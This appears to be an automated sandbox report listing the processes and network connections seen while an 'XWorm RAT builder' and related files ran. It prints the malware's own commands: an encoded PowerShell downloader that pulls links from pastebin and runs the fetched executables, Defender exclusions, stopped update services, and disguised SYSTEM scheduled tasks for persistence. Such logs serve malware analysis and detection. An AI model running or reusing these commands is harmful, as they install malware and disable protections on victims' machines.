"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3636 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4648 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3936 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5736 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5220 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe
"C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
"C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"
C:\Users\Admin\Desktop\builder.exe
"C:\Users\Admin\Desktop\builder.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2424 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 1668"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Static\wsappx.exe
"wsappx.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 3724 -ip 3724
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3724 -s 2332
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 2576 -ip 2576
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 2420
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\builder.exe
"C:\Users\Admin\Desktop\builder.exe"
C:\Users\Admin\Desktop\XHVNC.exe
"C:\Users\Admin\Desktop\XHVNC.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP"
C:\Users\Admin\Desktop\XWorm.exe
"C:\Users\Admin\Desktop\XWorm.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2f4
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 2920 -ip 2920
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2920 -s 7812
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 3848 -ip 3848
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3848 -s 4116
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 2100 -ip 2100
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2100 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 3596 -ip 3596
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3596 -s 3528
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 772 -ip 772
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 772 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 3568 -ip 3568
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 2868 -ip 2868
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2868 -s 3576
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\New folder\" -an -ai#7zMap19790:98:7zEvent20048
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
"C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\AtlsWare.exe
"C:\Users\Admin\Desktop\AtlsWare.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBoAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB4AGkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxAGwAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHoAYQBDAGcAcgBSADAAMgAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHEAZgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQB5AGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAZQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAagBjAHUAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 632 -ip 632
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 204 -p 688 -ip 688
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 632 -s 836
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 688 -s 3496
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 384 -ip 384
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 2736 -ip 2736
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2736 -s 1584
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 3576 -ip 3576
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3576 -s 992
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 5020 -ip 5020
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5020 -s 396
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3048 -ip 3048
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3048 -s 2408
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e4 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000098 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000ec 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f0 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000140 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000098 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000080 00000084
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.113.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 3.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crax-pro.webpkgcache.com | udp |
| DE | 172.217.23.193:443 | crax-pro.webpkgcache.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| DE | 172.217.23.206:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.114.82.140.in-addr.arpa | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 140.82.113.10:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 10.113.82.140.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 88.221.24.59:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.24.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.8.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
